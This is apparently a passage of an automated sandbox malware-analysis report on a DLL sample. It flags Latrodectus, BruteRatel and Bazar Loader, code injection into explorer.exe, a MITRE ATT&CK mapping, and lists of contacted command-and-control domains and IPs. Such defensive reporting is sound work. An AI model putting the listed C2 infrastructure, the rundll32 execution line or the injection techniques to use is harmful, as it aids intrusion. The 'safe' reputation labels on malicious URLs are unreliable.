                      Source: C:\Windows\System32\rundll32.exeThread register set: target process: 6516
                      Source: C:\Windows\System32\rundll32.exeThread register set: target process: 6516
                      Source: C:\Windows\System32\rundll32.exeThread register set: target process: 6516
                      Source: C:\Windows\System32\rundll32.exeThread register set: target process: 6516
                      Sets debug register (to hijack the execution of another thread)
                      Source: C:\Windows\System32\rundll32.exeThread register set: 6516 1
                      Writes to foreign memory regions
                      Source: C:\Windows\System32\rundll32.exeMemory written: C:\Windows\explorer.exe base: 13A0000
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\upfilles.dll.dll",#1
                      Source: explorer.exe, 00000016.00000002.2942821965.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940227099.0000000004CE0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1847916203.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 00000016.00000000.1844891451.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000002.2938046859.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 00000016.00000002.2937197092.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1844548016.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
                      Source: explorer.exe, 00000016.00000000.1844891451.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000002.2938046859.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: explorer.exe, 00000016.00000000.1844891451.00000000018A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000002.2938046859.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800206B0 cpuid
                      Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018000E5BC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
                      Source: C:\Windows\explorer.exeCode function: 22_2_013A7318 GetUserNameA,wsprintfA,
                      Source: C:\Windows\explorer.exeCode function: 22_2_013ADB28 GetVersionExW,
                      Source: Amcache.hve.9.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                      Source: Amcache.hve.9.drBinary or memory string: msmpeng.exe
                      Source: Amcache.hve.9.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: Amcache.hve.9.drBinary or memory string: MsMpEng.exe

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Bazar Loader
                      Source: Yara matchFile source: 18.2.rundll32.exe.29211650000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.292116a0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.292116a0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000012.00000002.2938671459.0000029211650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2938735431.00000292116A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Yara detected BruteRatel
                      Source: Yara matchFile source: 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1843049394.0000029213423000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1843192476.0000029213423000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2738816096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1842909028.0000029213422000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2311847302.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2284190577.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7320, type: MEMORYSTR
                      Yara detected Latrodectus
                      Source: Yara matchFile source: 18.3.rundll32.exe.7df4f0220000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.0.explorer.exe.13a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.3.rundll32.exe.7df4f0220000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.0.explorer.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.explorer.exe.13a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.explorer.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000016.00000003.2703639060.0000000003250000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000000.1844669819.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1867725723.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1868887059.00000292135D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1868680221.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000003.2807505534.0000000008820000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1867965215.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.2945149697.000000000B52C000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1867247710.00007DF4F0220000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.2938259956.0000000003140000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1868287262.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1868470583.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected Bazar Loader
                      Source: Yara matchFile source: 18.2.rundll32.exe.29211650000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.292116a0000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.292116a0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000012.00000002.2938671459.0000029211650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2938735431.00000292116A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Yara detected BruteRatel
                      Source: Yara matchFile source: 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1843049394.0000029213423000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1843192476.0000029213423000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2738816096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1842909028.0000029213422000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2311847302.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2284190577.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7320, type: MEMORYSTR
                      Yara detected Latrodectus
                      Source: Yara matchFile source: 18.3.rundll32.exe.7df4f0220000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.0.explorer.exe.13a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.3.rundll32.exe.7df4f0220000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.0.explorer.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.explorer.exe.13a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.explorer.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000016.00000003.2703639060.0000000003250000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000000.1844669819.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1867725723.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1868887059.00000292135D1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1868680221.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000003.2807505534.0000000008820000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1867965215.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.2945149697.000000000B52C000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1867247710.00007DF4F0220000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.2938259956.0000000003140000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000016.00000002.2937512886.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1868287262.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000003.1868470583.00000292135D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
                      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                      Registry Run Keys / Startup Folder                      		912
                      Process Injection                      		21
                      Virtualization/Sandbox Evasion                      		OS Credential Dumping1
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		11
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/Job1
                      DLL Side-Loading                      		1
                      Registry Run Keys / Startup Folder                      		912
                      Process Injection                      		LSASS Memory51
                      Security Software Discovery                      		Remote Desktop ProtocolData from Removable Media3
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      DLL Side-Loading                      		1
                      Obfuscated Files or Information                      		Security Account Manager21
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin SharesData from Network Shared Drive3
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      Regsvr32                      		NTDS3
                      Process Discovery                      		Distributed Component Object ModelInput Capture114
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Rundll32                      		LSA Secrets1
                      Application Window Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      DLL Side-Loading                      		Cached Domain Credentials1
                      Account Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                      System Owner/User Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                      System Network Configuration Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow2
                      File and Directory Discovery                      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing13
                      System Information Discovery                      		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1439879 Sample: upfilles.dll.exe Startdate: 11/05/2024 Architecture: WINDOWS Score: 100 39 workspacin.cloud 2->39 41 boriz400.com 2->41 43 8 other IPs or domains 2->43 53 Found malware configuration 2->53 55 Multi AV Scanner detection for submitted file 2->55 57 Yara detected Latrodectus 2->57 59 5 other signatures 2->59 9 loaddll64.exe 1 2->9         started        signatures3 process4 process5 11 rundll32.exe 1 12 9->11         started        15 cmd.exe 1 9->15         started        17 rundll32.exe 9->17         started        19 8 other processes 9->19 dnsIp6 47 altynbe.com 138.124.183.215, 443, 49750, 49757 NOKIA-ASFI Norway 11->47 49 anikvan.com 95.164.68.73, 443, 49754, 49755 NASSIST-ASGI Gibraltar 11->49 51 3 other IPs or domains 11->51 65 System process connects to network (likely due to code injection or exploit) 11->65 67 Injects code into the Windows Explorer (explorer.exe) 11->67 69 Sets debug register (to hijack the execution of another thread) 11->69 71 5 other signatures 11->71 21 explorer.exe 38 2 11->21 injected 25 rundll32.exe 15->25         started        27 WerFault.exe 20 16 17->27         started        29 WerFault.exe 16 19->29         started        31 WerFault.exe 16 19->31         started        33 WerFault.exe 16 19->33         started        signatures7 process8 dnsIp9 45 workspacin.cloud 104.21.16.155, 443, 49777, 49782 CLOUDFLARENETUS United States 21->45 61 System process connects to network (likely due to code injection or exploit) 21->61 35 rundll32.exe 21->35         started        37 rundll32.exe 21->37         started        63 Contains functionality to inject threads in other processes 25->63 signatures10 process11

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      upfilles.dll.dll16%ReversingLabs

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://simpleflying.com/how-do-you-become-an-air-traffic-controller/0%URL Reputationsafe
                      https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img0%URL Reputationsafe
                      https://outlook.com_0%URL Reputationsafe
                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure(0%Avira URL Cloudsafe
                      https://altynbe.com/tyk.io0%Avira URL Cloudsafe
                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure0%Avira URL Cloudsafe
                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure40%Avira URL Cloudsafe
                      https://anikvan.com/content.php0%Avira URL Cloudsafe
                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/0%Avira URL Cloudsafe
                      https://boriz400.com/api/azurey0%Avira URL Cloudsafe
                      https://illoskanawer.com/live/0%Avira URL Cloudsafe
                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure=0%Avira URL Cloudsafe
                      https://powerpoint.office.comcember0%URL Reputationsafe
                      https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/api/azure0%Avira URL Cloudsafe
                      http://schemas.micro0%URL Reputationsafe
                      https://altynbe.com/content.php0%Avira URL Cloudsafe
                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.phpP0%Avira URL Cloudsafe
                      https://anikvan.com/I~0%Avira URL Cloudsafe
                      https://anikvan.com/0%Avira URL Cloudsafe
                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/f0%Avira URL Cloudsafe
                      https://boriz400.com/api/azure0%Avira URL Cloudsafe
                      https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.php40%Avira URL Cloudsafe
                      https://anikvan.com/content.php.f0%Avira URL Cloudsafe
                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php1j0%Avira URL Cloudsafe
                      https://workspacin.cloud/live/0vaH0%Avira URL Cloudsafe
                      https://altynbe.com/U~0%Avira URL Cloudsafe
                      https://workspacin.cloud/live/60%Avira URL Cloudsafe
                      https://altynbe.com/B_F0%Avira URL Cloudsafe
                      https://anikvan.com/content.phpGf0%Avira URL Cloudsafe
                      https://altynbe.com/content.php2f0%Avira URL Cloudsafe
                      https://anikvan.com/api/azuret.php.f0%Avira URL Cloudsafe
                      https://altynbe.com/0%Avira URL Cloudsafe
                      https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpL0%Avira URL Cloudsafe
                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurent.php0%Avira URL Cloudsafe
                      https://anikvan.com/d0%Avira URL Cloudsafe
                      https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.php0%Avira URL Cloudsafe
                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurep1j0%Avira URL Cloudsafe
                      https://altynbe.com/api/azureontent.phpMfE0%Avira URL Cloudsafe
                      https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpA0%Avira URL Cloudsafe
                      https://altynbe.com/api/azure0%Avira URL Cloudsafe
                      https://workspacin.cloud/live/J50%Avira URL Cloudsafe
                      https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpLgF0%Avira URL Cloudsafe
                      https://boriz400.com/qa0%Avira URL Cloudsafe
                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure.php0%Avira URL Cloudsafe
                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php&j0%Avira URL Cloudsafe
                      https://workspacin.cloud/0%Avira URL Cloudsafe
                      https://boriz400.com/content.php0%Avira URL Cloudsafe
                      https://altynbe.com/X0%Avira URL Cloudsafe
                      https://altynbe.com/d0%Avira URL Cloudsafe
                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurepP0%Avira URL Cloudsafe
                      https://anikvan.com/api/azure==0%Avira URL Cloudsafe
                      https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpMfE0%Avira URL Cloudsafe
                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurepjB0%Avira URL Cloudsafe
                      https://boriz400.com/0%Avira URL Cloudsafe
                      https://altynbe.com/5~0%Avira URL Cloudsafe
                      https://altynbe.com/api/azureure0%Avira URL Cloudsafe
                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php40%Avira URL Cloudsafe
                      https://altynbe.com/=~0%Avira URL Cloudsafe
                      https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/n0%Avira URL Cloudsafe
                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php0%Avira URL Cloudsafe
                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurep&j0%Avira URL Cloudsafe
                      https://workspacin.cloud/live/0%Avira URL Cloudsafe
                      https://anikvan.com/api/azure0%Avira URL Cloudsafe
                      https://altynbe.com/api/azurep0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      workspacin.cloud
                      		104.21.16.155
                      		truetrue
                        		unknown
                        ae1f8849daaac4ee6b80681872ab88b9-1762121307.eu-central-1.elb.amazonaws.com
                        		3.69.236.35
                        		truefalse
                          		high
                          boriz400.com
                          		91.194.11.183
                          		truetrue
                            		unknown
                            altynbe.com
                            		138.124.183.215
                            		truetrue
                              		unknown
                              anikvan.com
                              		95.164.68.73
                              		truetrue
                                		unknown
                                ae97372e4f96e4d1299fbaeb7130b656-1584023256.us-east-1.elb.amazonaws.com
                                		54.175.181.104
                                		truefalse
                                  		high
                                  uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io
                                  		unknown
                                  		unknownfalse
                                    		unknown
                                    ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io
                                    		unknown
                                    		unknownfalse
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      https://illoskanawer.com/live/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azuretrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://anikvan.com/content.phptrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/api/azuretrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://altynbe.com/content.phptrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://boriz400.com/api/azuretrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phptrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://altynbe.com/api/azuretrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://boriz400.com/content.phptrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.phptrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://workspacin.cloud/live/true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://anikvan.com/api/azuretrue
                                      • Avira URL Cloud: safe
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://aka.ms/odirmrexplorer.exe, 00000016.00000000.1846357884.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		high
                                        https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure4rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		high
